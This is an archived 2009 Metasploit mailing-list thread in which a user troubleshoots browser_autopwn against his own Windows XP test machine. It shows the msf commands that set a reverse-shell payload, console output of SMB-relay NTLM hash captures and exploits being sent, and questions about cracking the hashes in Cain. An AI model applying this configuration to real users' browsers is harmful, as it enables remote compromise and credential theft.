Metasploit mailing list archives
IE/FF Pawnage.
From: wfdawson at bellsouth.net (wfdawson at bellsouth.net)
Date: Mon, 05 Jan 2009 01:27:38 +0000
Hi all, Please pardon my apparent ignorance, but can someone point me to a how-to or suitable hint-age on translating the 49-character LMHASH and NTHASH output in the message below into something that Cain will accept? Thanks in advance! -------------- Original message from egypt at metasploit.com: --------------
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Browser autopwn hasn't been updated to use the new IE7 XML vulnerability yet; what you are seeing is MS06-071. The Firefox exploits included with Metasploit are all relatively old so an installation newer than 1.5 would be unexploitable. I'm not sure why so many smb_relay attempts happened in this case but those hashes can be put right into Cain for cracking. The reason browser autopwn didn't try other exploits is the whole point of browser autopwn: it uses javascript to determine what exploits the target might be vulnerable to. Hope this helped. egypt -----BEGIN PGP SIGNATURE----- Version: GnuPG v2.0.7 (GNU/Linux) iD8DBQFJYFw8ABHabZqEWJ0RAjMDAJ4xtdTAzt/0Qr7N5m5Yumplh2TQ2ACdFdyn 08qRyxk4ZEX0xDBRwYuT2+Q= =ifdF -----END PGP SIGNATURE----- On Sat, Jan 3, 2009 at 1:32 PM, Richard Miles wrote:Hi I'm testing browser_autopwn, I updated metasploit with SVN and basicly I used this commands: msf> use auxiliary/server/browser_autopwn msf> setg AUTOPWN_HOST 10.1.1.2 AUTOPWN_HOST => 10.1.1.2 msf> setg AUTOPWN_PORT 8888 AUTOPWN_PORT => 8888 msf> setg AUTOPWN_URI /ads AUTOPWN_URI => /ads msf> set LHOST 10.1.1.2 LHOST => 10.1.1.2 msf> set LPORT 4500 LPORT => 4500 msf> set SRVPORT 8888 SRVPORT => 8888 msf> set URIPATH /ads URIPATH => /ads msf> set PAYLOAD windows/shell/reverse_tcp msf> run I tried to exploit my IE 7.0.5730.13 FireFox 3.0.5, My FF I installed more than 1 month and the IE I only installed IE7 and never updated and it was unable to exploit. The output in msf console looks like this: msf auxiliary(browser_autopwn) > [*] Request '/ads' from 10.1.1.2:2166 [*] Recording detection from User-Agent [*] Browser claims to be MSIE 7.0, running on Windows XP [*] Responding with exploits [*] Received 10.1.1.2:2167 \ LMHASH:00 NTHASH: OS:Windows 2002 Service Pack 2 2600 LM:Windows 2002 5.1 [*] Sending Access Denied to 10.1.1.2:2167 \ [*] Received 10.1.1.2:2167 HOME\Administrator LMHASH:856c3a815783b659220ea52f71f53677cb50bb89038cd09e NTHASH:d4c133a04a549e9746de954717cb3c7b82ce28859ab3d749 OS:Windows 2002 Service Pack 2 2600 LM:Windows 2002 5.1 [*] Authenticating to 10.1.1.2 as HOME\Administrator... [*] Failed to authenticate as HOME\Administrator... [*] Sending Access Denied to 10.1.1.2:2167 HOME\Administrator [*] Received 10.1.1.2:2170 \ LMHASH:00 NTHASH: OS:Windows 2002 Service Pack 2 2600 LM:Windows 2002 5.1 [*] Sending Access Denied to 10.1.1.2:2170 \ [*] Received 10.1.1.2:2170 HOME\Administrator LMHASH:0e3464274565da1174376257ea92a3705d15b8f67a548aedd NTHASH:4c5ba976581ae17674c2c4d41b3c9a7121764f98fc3e8575 OS:Windows 2002 Service Pack 2 2600 LM:Windows 2002 5.1 [*] Authenticating to 10.1.1.2 as HOME\Administrator... [*] Failed to authenticate as HOME\Administrator...v> [*] Sending Access Denied to 10.1.1.2:2170 HOME\Administrator[*] Received 10.1.1.2:2172 \ LMHASH:00 NTHASH: OS:Windows 2002 Service Pack 2 2600 LM:Windows 2002 5.1 [*] Sending Access Denied to 10.1.1.2:2172 \ [*] Received 10.1.1.2:2172 HOME\Administrator LMHASH:1ea66a6fb256fdec1c7ab9c4efd3fdda6f52d1f7157f6ba8b NTHASH:a1f355fa0144e541351627cbf9750cd0c50c327d858cf15e OS:Windows 2002 Service Pack 2 2600 LM:Windows 2002 5.1 [*] Authenticating to 10.1.1.2 as HOME\Administrator... [*] Failed to authenticate as HOME\Administrator... [*] Sending Access Denied to 10.1.1.2:2172 HOME\Administrator [*] Sending Apple QuickTime 7.1.3 RTSP URI Buffer Overflow to 10.1.1.2:2166... [*] Sending iPhone MobileSafari LibTIFF Buffer Overflow to 10.1.1.2:2174... [*] Request '/ads?sessid=V2luZG93czpYUDpTUDI6cHQtYnI6eDg2Ok1TSUU6Ny4w' from 10.1.1.2:2166 [*] Recording detection from JavaScript [*] Report: Windows:XP:SP2:pt-br:x86:MSIE:7.0 [*] Sending exploit HTML to 10.1.1.2:2166... [*] Sending Internet Explorer XML Core Services HTTP Request Handling to 10.1.1.2:2174... [*] Request '/ads' from 10.1.1.2:2166 [*] Recording detection from User-Agent [*] Browser claims to be MSIE 7.0, running on Windows XP [*] Responding with exploits [*] Received 10.1.1.2:2182 \ LMHASH:00 NTHASH: OS:Windows 2002 Service Pack 2 2600 LM:Windows 2002 5.1 [*] Sending Access Denied to 10.1.1.2:2182 \ [*] Received 10.1.1.2:2182 HOME\Administrator LMHASH:18f4dc5457ecec5995b3ac9a477acc7e74464cb82d2831a NTHASH:ed2322d3695592c67bb59a5f5dcb7c947b0ade6034824394 OS:Windows 2002 Service Pack 2 2600 LM:Windows 2002 5.1 [*] Authenticating to 10.1.1.2 as HOME\Administrator... [*] Failed to authenticate as HOME\Administrator... [*] Sending Access Denied to 10.1.1.2:2182 HOME\Administrator [*] Received 10.1.1.2:2184 \ LMHASH:00 NTHASH: OS:Windows 2002 Service Pack 2 2600 LM:Windows 2002 5.1 [*] Sending Access Denied to 10.1.1.2:2184 \ [*] Received 10.1.1.2:2184 HOME\Administrator LMHASH:d889289cd0d4d8637422d39510e48ea325d61de7ad4fc8b6 NTHASH:bc5888b4afe06c19118b0eb5f176535885dbe44eddc87f15 OS:Windows 2002 Service Pack 2 2600 LM:Windows 2002 5.1 [*] Authenticating to 10.1.1.2 as HOME\Administrator... [*] Failed to authenticate as HOME\Administrator... [*] Sending Access Denied to 10.1.1.2:2184 HOME\Administrator [*] Received 10.1.1.2:2186 \ LMHASH:00 NTHASH: OS:Windows 2002 Service Pack 2 2600 LM:Windows 2002 5.1 [*] Sending Access Denied to 10.1.1.2:2186 \ [*] Received 10.1.1.2:2186 HOME\Administrator LMHASH:87f9d52ed9280f9a453f8b6827f277729ecab072253de369 NTHASH:39364816918e506ddf64c022061ef871886f7ab7124f5967 OS:Windows 2002 Service Pack 2 2600 LM:Windows 2002 5.1 [*] Authenticating to 10.1.1.2 as HOME\Administrator... [*] Failed to authenticate as HOME\Administrator... [*] Sending Access Denied to 10.1.1.2:2186 HOME\Administrator [*] Sending Apple QuickTime 7.1.3 RTSP URI Buffer Overflow to 10.1.1.2:2166... [*] Sending iPhone MobileSafari LibTIFF Buffer Overflow to 10.1.1.2:2188... [*] Request '/ads?sessid=V2luZG93czpYUDpTUDI6cHQtYnI6eDg2Ok1TSUU6Ny4w' from 10.1.1.2:2166 [*] Recording detection from JavaScript [*] Report: Windows:XP:SP2:pt-br:x86:MSIE:7.0 [*] Sending Internet Explorer XML Core Services HTTP Request Handling to 10.1.1.2:2166... [*] Sending exploit HTML to 10.1.1.2:2191... Why it only tested the XML flaw at IE ? By the way, for the time I do not update, this exploit should have worked, not? The FF was inexploitable equally. Strange, it only gave 2 or 3 shots and stoped. I made something wrong? This machine is Win XP SP2 with Avast. Also I saw it output several times NTLM hashes from the box, using smbrelay I believe, right? Well, why this hashes are all different all the time? Is it NTLM challenge? If yes, would not be good add the challenge at the output, because at last we can try use it to brute-force the password of the account. Thank you and have a happy new year. _______________________________________________ http://spool.metasploit.com/mailman/listinfo/framework_______________________________________________ http://spool.metasploit.com/mailman/listinfo/framework
-------------- next part -------------- An HTML attachment was scrubbed... URL: <http://mail.metasploit.com/pipermail/framework/attachments/20090105/10aae7e2/attachment.htm>
Current thread:
- IE/FF Pawnage. Richard Miles (Jan 03)
- IE/FF Pawnage. egypt at metasploit.com (Jan 03)
- IE/FF Pawnage. wfdawson at bellsouth.net (Jan 04)
- IE/FF Pawnage. H D Moore (Jan 04)
- IE/FF Pawnage. wfdawson at bellsouth.net (Jan 04)
- IE/FF Pawnage. egypt at metasploit.com (Jan 03)